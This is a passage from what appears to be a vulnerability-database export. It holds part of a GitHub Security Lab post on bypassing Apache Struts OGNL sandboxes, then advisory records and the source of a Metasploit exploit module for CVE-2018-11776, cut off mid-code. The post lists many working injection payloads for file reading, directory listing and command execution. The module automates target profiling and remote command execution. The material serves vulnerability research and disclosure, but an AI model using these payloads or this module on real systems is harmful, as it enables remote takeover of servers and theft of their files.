An example payload levering [Text4Shell](<https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/>):\n \n \n \n objectWrapper.staticModels.get(\"org.apache.commons.text.lookup.StringLookupFactory\").get(\"INSTANCE\").getWrappedObject().scriptStringLookup().lookup(\"javascript:3+4\")\n \n \n\n`**wrapAsAPI()`**\n\nThis method allows us to wrap any object with a `freemarker.ext.beans.BeanModel` giving us indirect access to its getters and setters methods. Struts\u2019 sandbox will not have visibility on these calls and therefore they can be used to call any blocklisted method.\n\n * `BeanModel.get('field_name')` returns a `TemplateModel` wrapping the object.\n * `BeanModel.get('method_name')` returns either a `SimpleMethodModel` or `OverloadedMethodsModel` wrapping the method.\n\nWe can, therefore, call any blocklisted method with:\n \n \n \n objectWrapper.wrapAsAPI(blocked_object).get(blocked_method)\n \n \n\nThis call will return an instance of `TemplateMethodModelEx`. Its `[exec()](<https://freemarker.apache.org/docs/api/freemarker/template/TemplateMethodModelEx.html#exec-java.util.List->)` method is defined in the `freemarker.template` namespace and, therefore, trying to invoke this method will get blocked by the Struts sandbox. However, `TemplateMethodModelEx` is an interface and what we will really get is an instance of either `freemarker.ext.beans.SimpleMethodModel` or `freemarker.ext.beans.OverloadedMethodsModel`. Since the `exec()` methods on both of them are defined on the `freemarker.ext.beans` namespace, which is not blocklisted, their invocation will succeed. As we saw before, arguments need to be wrapped. 
As an example, we can call `File.createTempFile(\"PREFIX\", \"SUFFIX\")` using the following payload:\n\n    objectWrapper.getStaticModels().get(\"java.io.File\").get(\"createTempFile\").exec({objectWrapper.wrap(\"PREFIX\"), objectWrapper.wrap(\"SUFFIX\")})\n\nWe can achieve the same by calling `getAPI()` on any `freemarker.template.TemplateModelWithAPISupport` instance. Many of the objects FreeMarker exposes implement this interface, which lets us wrap them in a `BeanModel`. For example, to list all the keys in the Struts Value Stack we can use:\n\n    #request['.freemarker.TemplateModel'].get('stack').getAPI().get(\"context\").getAPI().get(\"keySet\").exec({})\n\nNote that `com.opensymphony.xwork2.util.OgnlContext.keySet()` would be blocked since it belongs to the `com.opensymphony.xwork2.util` package, but in this case Struts' sandbox only sees calls to `TemplateHashModel.get()` and `TemplateModelWithAPISupport.getAPI()`, which are both allowed.\n\nThe last payload gives us a complete list of the objects available in the Value Stack, many of which could be used for further attacks. 
Let's see a more interesting example: reading an arbitrary file using `BeanModel`s:\n\n    (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n    (#f=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\web.xml\")}))+\n    (#p=#bw.wrapAsAPI(#f).get(\"toPath\").exec({}))+\n    (#ba=#bw.getStaticModels().get(\"java.nio.file.Files\").get(\"readAllBytes\").exec({#bw.wrap(#p)}))+\n    \"----\"+\n    (#b64=#bw.getStaticModels().get(\"java.util.Base64\").get(\"getEncoder\").exec({}).getAPI().get(\"encodeToString\").exec({#bw.wrap(#ba)}))\n\nOr listing the contents of a directory:\n\n    (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n    (#dir=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\lib\")}))+\n    (#l=#bw.wrapAsAPI(#dir).get(\"listFiles\").exec({}).getWrappedObject())+\"---\"+\n    (#l.{#this})\n\n#### OgnlTool/OgnlUtil\n\nThe `org.apache.struts2.views.jsp.ui.OgnlTool` class was calling `Ognl.getValue()` with no `OgnlContext`. Even though the OGNL library creates a default context in that case, the default does not carry the additional security checks the Struts framework adds, so it is easily bypassed:\n\n    package org.apache.struts2.views.jsp.ui;\n\n    import ognl.Ognl;\n    import ognl.OgnlException;\n    import com.opensymphony.xwork2.inject.Inject;\n    import com.opensymphony.xwork2.ognl.OgnlUtil;\n\n    public class OgnlTool {\n        private OgnlUtil ognlUtil;\n\n        public OgnlTool() { }\n\n        @Inject\n        public void setOgnlUtil(OgnlUtil ognlUtil) {\n            this.ognlUtil = ognlUtil;\n        }\n\n        public Object findValue(String expr, Object context) {\n            try {\n                // No OgnlContext is passed, so OGNL builds a default one without the Struts MemberAccess\n                return Ognl.getValue(ognlUtil.compile(expr), context);\n            } catch (OgnlException e) {\n                return null;\n            }\n        }\n    }\n\nWe can get an instance of `OgnlTool` from both 
FreeMarker and Velocity post-invocation contexts:\n\n    #request['.freemarker.TemplateModel'].get('ognl')\n\nOr:\n\n    #request['.KEY_velocity.struts2.context'].internalGet('ognl')\n\nIn FreeMarker's case it comes wrapped in a `TemplateModel`, but we can just unwrap it and use it to get RCE:\n\n    (#a=#request.get('.freemarker.Request').objectWrapper.unwrap(#request['.freemarker.TemplateModel'].get('ognl'),'org.apache.struts2.views.jsp.ui.OgnlTool'))+\n    (#a.findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',null))\n\nOr, even simpler:\n\n    #request['.freemarker.TemplateModel'].get('ognl').getWrappedObject().findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',{})\n\n`OgnlTool` was [inadvertently fixed](<https://github.com/apache/struts/commit/5cd409d382e00b190bfe4e957c4167d06b8f9da1#diff-55821720c975d84350d796bec09aa366cc2b2861fb7e12f223cc5a4453b55640>) when Struts 6.0.0 was released, by upgrading to OGNL 3.2.2, which always requires a `MemberAccess`. But the latest Struts 2 version (2.5.30) is still vulnerable to this payload.\n\n#### StrutsUtil\n\nAnother object that can be accessed in the post-invocation context is an instance of `org.apache.struts2.util.StrutsUtil`. 
There are plenty of interesting methods in here:\n\n * `public String include(Object aName)` can be used to read arbitrary resources:\n   * `<struts_utils>.include(\"/WEB-INF/web.xml\")`\n * `public Object bean(Object aName)` can be used to instantiate arbitrary types:\n   * `<struts_utils>.bean(\"javax.script.ScriptEngineManager\")`\n * `public List makeSelectList(String selectedList, String list, String listKey, String listValue)`\n   * `listKey` and `listValue` are evaluated with `OgnlTool`, and therefore in an unsandboxed context:\n   * `<struts_utils>.makeSelectList(\"#this\",\"{'foo'}\",\"(new freemarker.template.utility.Execute()).exec({'touch /tmp/bbbb'})\",\"\")`\n\nOn applications using Velocity as the view layer, this object will be an instance of `VelocityStrutsUtil`, which extends `StrutsUtil` and provides an additional vector:\n\n * `public String evaluate(String expression)` lets us evaluate a string containing a Velocity template:\n\n    (<struts_utils>.evaluate(\"#set ($cmd='java.lang.Runtime.getRuntime().exec(\\\"touch /tmp/pwned_velocity\\\")') $application['org.apache.tomcat.InstanceManager'].newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval($cmd)\"))\n\n#### JspApplicationContextImpl\n\nThe last vector I wanted to share is one I found a few years ago and was not able to exploit at the time, although I was fairly sure there had to be a way. The newly discovered post-invocation objects finally made it possible!\n\nIf you have inspected the Struts Servlet context (`#application`) in the past, you have probably seen an item with key `org.apache.jasper.runtime.JspApplicationContextImpl` that returns an instance of `org.apache.jasper.runtime.JspApplicationContextImpl`. 
This class has a `getExpressionFactory()` method that returns an Expression Factory exposing a `createValueExpression()` method. This looks like the perfect place to create an EL expression and evaluate it. The problem was that [`createValueExpression`](<https://docs.oracle.com/javaee/7/api/javax/el/ExpressionFactory.html#createValueExpression-javax.el.ELContext-java.lang.String-java.lang.Class->) requires an instance of `ELContext`, and we had none.\n\nFortunately, our post-invocation technique brings a new object into play. When using JSPs as the view layer, `#request['com.opensymphony.xwork2.dispatcher.PageContext']` returns an uninitialized `org.apache.jasper.runtime.PageContextImpl` instance that we can use to create an `ELContext` and evaluate arbitrary EL expressions:\n\n    (#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke())+\n    (#ctx=#request['com.opensymphony.xwork2.dispatcher.PageContext'])+\n    (#jsp=#application['org.apache.jasper.runtime.JspApplicationContextImpl'])+\n    (#elctx=#jsp.createELContext(#ctx))+\n    (#jsp.getExpressionFactory().createValueExpression(#elctx, '7*7', @java.lang.Class@class).getValue(#elctx))\n\nAvid readers may be wondering why Struts stores the `PageContext` in the request. Well, it turns out it does not, but we can reach it through chained contexts.\n\nWhen accessing `#attr` (`AttributeMap`), [we can indirectly look into multiple scopes](<https://struts.apache.org/maven/struts2-core/apidocs/org/apache/struts2/util/AttributeMap.html>) such as Page, Request, Session and Application (Servlet). But there is more: `org.apache.struts2.dispatcher.StrutsRequestWrapper.getAttribute()` looks for the attribute in the `ServletRequest` and, if it can't find it there, [it searches the value stack](<https://github.com/apache/struts/blob/master/core/src/main/java/org/apache/struts2/dispatcher/StrutsRequestWrapper.java#L94>)! 
So we can effectively access the value stack through the `#request` or `#attr` variables.\n\nIn this case, the `PageContext` was not stored in the request scope but in the Value Stack, and we are able to reach it through chained context searches.\n\nWe can even run arbitrary OGNL expressions through this path as long as they don't contain any hashes (`#`); for example, `#request[\"@java.util.HashMap@class\"]` returns the `HashMap` class.\n\n### Leveling up the BeanMap payload\n\nYou may already be familiar with McOwn's [technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). He realized that it was possible to use [OGNL map notation](<https://commons.apache.org/proper/commons-ognl/language-guide.html>) to instantiate an `org.apache.commons.collections.BeanMap` with the `#@org.apache.commons.collections.BeanMap@{ }` syntax, and then wrap any Java object in this map and access its getters and setters as map properties. 
His payload was based on the `org.apache.tomcat.InstanceManager` payload we introduced at [Black Hat 2020](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>) and looked like:\n\n    (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n    (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n    (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n    (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n    (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n    (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n    (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n    (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n    (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))\n\nThe payload was basically disabling the OGNL sandbox (emptying the excluded package and class lists of the `memberAccess` object reached through the chained BeanMaps) and then accessing otherwise blocked classes such as `InstanceManager`. 
There is a simpler way to abuse BeanMaps that does not require disabling the sandbox at all: reflection.\n\n    (#c=#@org.apache.commons.beanutils.BeanMap@{})+\n    (#c.setBean(@Runtime@class))+\n    (#rt=#c['methods'][6].invoke())+\n    (#c['methods'][12]).invoke(#rt,'touch /tmp/pwned')\n\nThe BeanMap exposes `Class.getMethods()` as its `methods` property, so the indexes (here `[6]` for the static `getRuntime()` and `[12]` for `exec(String)`) select entries of the reflected method array; that order is not specified by the JDK and may differ between JDK builds, so the indexes have to be re-derived for each target. This payload also works in Struts 6 if the `BeanMap` class is available on the classpath (either from Apache Commons Collections or Apache Commons BeanUtils), but you need to specify the fully qualified name for `Runtime`: `@java.lang.Runtime@class`.\n\n### Timeline\n\nThese bypasses were first reported to the Struts and OGNL security teams on June 9, 2022.\n\nOn October 7, 2022, the security team replied and stated that improving the block lists was not a sustainable solution, and therefore they decided to stop doing so. They highlighted that a [Java Security Manager can be configured](<https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable>) to protect every OGNL evaluation from these attacks, and we highly recommend doing so if you are running a Struts application. Bear in mind, however, that the [Security Manager is deprecated](<https://openjdk.org/jeps/411>) and will be removed from the JDK.\n\n## That's a wrap\n\nAt this point you have probably realized that sandboxing an expression language such as OGNL is a really difficult task, and may require maintaining a list of blocked classes and OGNL features even though that is not an optimal approach. In this blog post we have reviewed a few ways in which these sandboxes can be bypassed. 
Although they are specific to OGNL, hopefully you have learned to explore sandbox controls\u2013and one or two new tricks\u2013that may apply to other sandboxes. In total, we were able to raise $5,600, which we donated to [UNHCR](<https://www.unhcr.org/>) to help provide refuge for Ukrainians seeking protection from the war.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-27T16:00:49", "type": "github", "title": "Bypassing OGNL sandboxes for fun and charities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3087", "CVE-2016-4436", "CVE-2017-5638", "CVE-2018-11776", "CVE-2018-1327", "CVE-2020-17530", "CVE-2021-26084", "CVE-2022-26134"], "modified": "2023-01-27T13:33:03", "id": "GITHUB:0519EA92487B44F364A1B35C85049455", "href": "https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-08-28T02:33:40", "description": "Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution 
vulnerabilities.", "cvss3": {}, "published": "2018-08-24T00:00:00", "type": "zdt", "title": "Apache Struts 2.x Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T00:00:00", "id": "1337DAY-ID-30956", "href": "https://0day.today/exploit/description/30956", "sourceData": "[CVEID]:CVE-2018-11776\r\n[PRODUCT]:Apache Struts\r\n[VERSION]:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16\r\n[PROBLEMTYPE]:Remote Code Execution\r\n[REFERENCES]:https://cwiki.apache.org/confluence/display/WW/S2-057\r\n[DESCRIPTION]:Man Yue Mo from the Semmle Security Research team\r\nnoticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16\r\nsuffer from possible Remote Code Execution when using results with no\r\nnamespace and, at the same time, its upper action(s) have no or wildcard\r\nnamespace. Same possibility when using url tag which doesn't have value\r\nand action set and, at the same time, its upper action(s) have no or wildcard\r\nnamespace.\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30956", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T22:39:09", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.34, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. 
If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-08T00:00:00", "type": "zdt", "title": "Apache Struts 2 Namespace Redirect OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-08T00:00:00", "id": "1337DAY-ID-31056", "href": "https://0day.today/exploit/description/31056", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\r\n #include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\r\n 'Description' => %q{\r\n This module 
exploits a remote code execution vulnerability in Apache Struts\r\n version 2.3 - 2.3.34, and 2.5 - 2.5.16. Remote Code Execution can be performed\r\n via an endpoint that makes use of a redirect action.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n #TODO: Is that second paragraph above still accurate?\r\n 'Author' => [\r\n 'Man Yue Mo', # Discovery\r\n 'hook-s3c', # PoC\r\n 'asoto-r7', # Metasploit module\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-11776'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\r\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n [\r\n 'Automatic detection', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Windows', {\r\n 'Platform' => %w{ windows },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Linux', {\r\n 'Platform' => %w{ unix linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\r\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\r\n OptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. 
Cannot contain spaces', 'GET' ]),\r\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\r\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\r\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n # If vulnerable, the server should return an HTTP 302 (Redirect)\r\n # and the 'Location' header should contain either 'true' or 'false'\r\n if resp && resp.headers['Location']\r\n output = resp.headers['Location']\r\n vprint_status(\"Redirected to: #{output}\")\r\n if (output.include? '/true/')\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n elsif (output.include? '/false/')\r\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\r\n datastore['ENABLE_STATIC'] = true\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n elsif resp && resp.code==400\r\n # METHOD 2: Generate two random numbers, ask the target to add them together.\r\n # If it does, it's vulnerable.\r\n a = rand(10000)\r\n b = rand(10000)\r\n c = a+b\r\n\r\n ognl = \"#{a}+#{b}\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n if resp.headers['Location'].include? c.to_s\r\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. 
Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload()\r\n end\r\n end\r\n\r\n def encode_ognl(ognl)\r\n # Check and fail if the command contains the follow bad characters:\r\n # ';' seems to terminates the OGNL statement\r\n # '/' causes the target to return an HTTP/400 error\r\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\r\n # '\\r' ends the GET request prematurely\r\n # '\\n' ends the GET request prematurely\r\n\r\n # TODO: Make sure the following line is uncommented\r\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\r\n bad_chars.each do |c|\r\n if ognl.include? c\r\n print_error(\"Bad OGNL request: #{ognl}\")\r\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\r\n end\r\n end\r\n\r\n # The following list of characters *must* be encoded or ORNL will asplode\r\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\r\n \" \": \"%20\",\r\n \"\\\"\":\"%22\",\r\n \"#\": \"%23\",\r\n \"'\": \"%27\",\r\n \"<\": \"%3c\",\r\n \">\": \"%3e\",\r\n \"?\": \"%3f\",\r\n \"^\": \"%5e\",\r\n \"`\": \"%60\",\r\n \"{\": \"%7b\",\r\n \"|\": \"%7c\",\r\n \"}\": \"%7d\",\r\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\r\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c%5c\", # Doesn't work. 
Anyone have a cool idea for a workaround?\r\n }\r\n\r\n encodable_chars.each do |k,v|\r\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\r\n ognl.gsub!(\"#{k}\",\"#{v}\")\r\n end\r\n return ognl\r\n end\r\n\r\n def send_struts_request(ognl, payload: nil)\r\n=begin #badchar-checking code\r\n pre = ognl\r\n=end\r\n\r\n ognl = \"${#{ognl}}\"\r\n vprint_status(\"Submitted OGNL: #{ognl}\")\r\n ognl = encode_ognl(ognl)\r\n\r\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\r\n\r\n if payload\r\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\r\n headers[datastore['HEADER']] = payload\r\n end\r\n\r\n # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs\r\n uri = \"/#{ognl}/#{datastore['ACTION']}\"\r\n\r\n resp = send_request_cgi(\r\n #'encode' => true, # this fails to encode '\\', which is a problem for me\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\r\n end\r\n\r\n=begin #badchar-checking code\r\n print_status(\"Response code: #{resp.code}\")\r\n #print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body\r\n if resp.headers['Location']\r\n print_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\")\r\n if resp.headers['Location'].split('/')[1] == pre[1..-2]\r\n print_good(\"GOT 'EM!\")\r\n else\r\n print_error(\" #{pre[1..-2]}\")\r\n end\r\n end\r\n=end\r\n\r\n resp\r\n end\r\n\r\n def profile_target\r\n # Use OGNL to extract properties from the Java environment\r\n\r\n properties = { 'os.name': nil, # e.g. 'Linux'\r\n 'os.arch': nil, # e.g. 'amd64'\r\n 'os.version': nil, # e.g. '4.4.0-112-generic'\r\n 'user.name': nil, # e.g. 'root'\r\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\r\n 'user.language': nil, # e.g. 'en'\r\n #'java.io.tmpdir': nil, # e.g. 
'/usr/local/tomcat/temp' (didn't work in testing)\r\n }\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|('#{rand_text_alpha(2)}')|\r\n properties.each do |k,v|\r\n ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|\r\n end\r\n ognl = ognl[0...-4]\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\r\n elsif r.headers['Location']\r\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\r\n # Extract the OGNL output from the Location path, and strip the two random chars\r\n s = r.headers['Location'].split('/')[1][2..-1]\r\n\r\n if s.nil?\r\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\r\n # But we didn't get any output, so we can't profile the target. Abort.\r\n return nil\r\n end\r\n\r\n # Confirm that all fields were returned, and none include extra (:) delimiters\r\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\r\n if s.count(':') > properties.length\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\r\n end\r\n\r\n # Separate the colon-delimited properties and store in the 'properties' hash\r\n s = s.split(':')\r\n i = 0\r\n properties.each do |k,v|\r\n properties[k] = s[i]\r\n i += 1\r\n end\r\n\r\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\r\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\r\n return properties\r\n else\r\n print_error(\"Failed to profile target. 
Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\r\n end\r\n end\r\n\r\n def execute_command(cmd_input, opts={})\r\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\r\n if cmd_input.include? ';'\r\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\r\n end\r\n\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n if (os.include? 'linux') || (os.include? 'nix')\r\n cmd = \"{'sh','-c','#{cmd_input}'}\"\r\n elsif os.include? 'win'\r\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\r\n else\r\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\r\n cmd = cmd_input\r\n end\r\n\r\n # The following OGNL will run arbitrary commands on Windows and Linux\r\n # targets, as well as returning STDOUT and STDERR. 
In my testing,\r\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\r\n\r\n vprint_status(\"Executing: #{cmd}\")\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start()).|\r\n ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|\r\n ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|\r\n ognl << %q|(#r.flush())|\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r && r.code == 200\r\n print_good(\"Command executed:\\n#{r.body}\")\r\n elsif r\r\n if r.body.length == 0\r\n print_status(\"Payload sent, but no output provided from server.\")\r\n elsif r.body.length > 0\r\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\r\n end\r\n end\r\n end\r\n\r\n def send_payload\r\n # Probe for the target OS and architecture\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 
